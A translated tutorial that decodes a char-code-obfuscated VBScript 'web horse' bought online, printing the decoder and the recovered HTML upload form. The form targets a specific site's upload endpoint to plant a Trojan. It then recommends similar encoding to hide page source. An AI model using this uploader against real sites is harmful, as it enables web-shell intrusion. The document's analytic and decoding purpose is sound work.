Cracking and utilization of an ASC-encrypted web horse

Source: Internet
Author: User

Someone in a QQ group was selling web horses. A netizen paid for a copy and shared it with me to look at, which led to this article.

1. Exploring the web horse

Open the web horse in the browser. This web horse has simple functions and is mainly used to upload a more powerful web horse. Its distinguishing feature is that it targets the upload vulnerability on the target web page, and you can modify the configuration yourself. Viewing the source code of the web horse shows that it is encrypted, evidently with ASC encryption. (Figure 1)


2. Web horse analysis

Although the core functional code of the web horse is ASC encrypted, its framework is clear at a glance. The code and its interpretation are as follows:

<script language="vbscript">
' The web horse is a VBScript script.
Function rechange(k)
    ' Defines the function rechange, which takes one parameter k.
    s = Split(k, ",")
    ' Split breaks k apart at each "," and returns the pieces as an array.
    t = ""
    ' Start t as an empty string.
    For i = 0 To UBound(s)
        t = t & ChrW(eval(s(i)))
        ' Loop over the array: evaluate each element, convert the value to a character with ChrW, and append it to t. UBound returns the highest index of the array.
    Next
    rechange = t
    ' Return t as the function's result.
End Function
t = "104,116,109,108, 110,115,105,116,105,111,110, 97,108 ,......"
' The middle part is omitted; this value is the functional code of the web horse.
document.write rechange(t)
' Write the function's return value into the page in the browser.
</script>
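
The decoding that rechange performs can be reproduced statically, without running the script or calling eval on its values. The following is an added example, not code from the original article or from the author's tool; SAMPLE is a constructed, harmless script, the function names are hypothetical, and accepting VBScript &H hex literals goes beyond the decimal values shown on the page.

```python
import re

# Constructed sample: the page's decoder framework around a short, harmless
# payload (the codes spell '<html><b>hi</b></html>').
SAMPLE = '''<script language="vbscript">
Function rechange(k)
    s = Split(k, ",")
    t = ""
    For i = 0 To UBound(s)
        t = t & ChrW(eval(s(i)))
    Next
    rechange = t
End Function
t = "60,104,116,109,108,62,60,98,62,104,105,60,47,98,62,60,47,104,116,109,108,62"
document.write rechange(t)
</script>'''

NUM = r"(?:\d+|&H[0-9A-Fa-f]+)"          # decimal or VBScript hex literal
# A quoted string that contains nothing but comma-separated numeric literals.
CODE_LIST = re.compile(r'"(\s*%s(?:\s*,\s*%s)+\s*)"' % (NUM, NUM))

def decode_list(values):
    """Turn '104,116,...' into text without evaluating anything."""
    chars = []
    for item in values.split(","):
        item = item.strip()
        if re.fullmatch(r"\d+", item):
            code = int(item)
        elif re.fullmatch(r"&H[0-9A-Fa-f]+", item):
            code = int(item[2:], 16)
        else:
            # The sample calls eval() on each item; an analyst must not.
            raise ValueError("not a plain numeric literal: %r" % item)
        if code > 0xFFFF:
            raise ValueError("outside the ChrW range: %r" % item)
        chars.append(chr(code))
    return "".join(chars)

def extract_payloads(script_text, min_items=8):
    """Decode every quoted char-code list with at least min_items entries."""
    return [decode_list(m.group(1)) for m in CODE_LIST.finditer(script_text)
            if m.group(1).count(",") + 1 >= min_items]

if __name__ == "__main__":
    for payload in extract_payloads(SAMPLE):
        print(payload)
```

Because only integer literals are accepted, a list item that contains an expression raises an error instead of being executed, which is the safe way to handle a sample that passes each item to eval.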


3. Web horse decryption

You can write an ASC decryption tool yourself. I downloaded someone else's ASC decryption code from the Internet, then modified and recompiled it into a decryption tool based on the encryption principle of the web horse.

Run the tool, copy the value assigned to t in the web horse's source code into the corresponding text box of the tool, and click decrypt to restore the source code of the web horse. (Figure 2)


<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit="return Click()" enctype=multipart/form-data>
<p align="center"><span class="STYLE4">source (</span><span class="STYLE3">image</span><span class="STYLE4">) file:
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
Target (</span><span class="STYLE3">Trojan</span><span class="STYLE4">) file:
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style="border:1px double rgb(88,88,88); font:9pt" value="upload Trojan">
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>

4. Decryption effect

Save the HTML code obtained by decrypting the web horse as a test.htm file, open the file in the browser, and test uploading a file. This shows that the ASC encryption of the web horse has been successfully decrypted. (Figure 3)


5. Encryption and exploitation

After cracking the ASC encryption of the web horse, we can use the same encryption principle to encrypt our own web pages and protect the page code. ASC encryption is mainly used to protect static page code, because dynamic code runs on the server side and the client only displays the results. The "IT expert network" page is dynamically generated. It is used as an example for demonstration.

View and copy the web page code, and convert its characters to ASC values using an ASCII lookup tool. Then copy the generated ASC values into the code of the web horse we cracked, as the value of t. In this way, no one else can see the source code of the web page; only the ASC values of the page are displayed, which protects the web page code. The page runs the same as it did before encryption. (Figure 4)


Summary: ASC encryption is currently the main form of static web page encryption. As the decryption of this web horse above shows, this form of encryption cannot fundamentally ensure the security of web page code. Based on my own website maintenance experience and that of my friends, we recommend several web page encryption methods:

1. Script encryption: implemented through script code such as VB and JAVA; it blocks right-click, prohibits viewing of source files, and encrypts called addresses.

2. IIS password: IIS security and authentication are deployed to prevent unauthorized access.

3. ASP program encryption: an ASP program is used to encrypt web pages. Most websites currently use ASP programs, which have no specific requirements on the web server; the encryption is designed with the help of a database and ASP programs to implement general-purpose web page encryption.

4. Software encryption: there is currently a lot of software that encrypts web pages. The basic principle is to use JavaScript code, but the software prepares the code automatically; you only need to paste in the source code of the web page and click "encrypt".



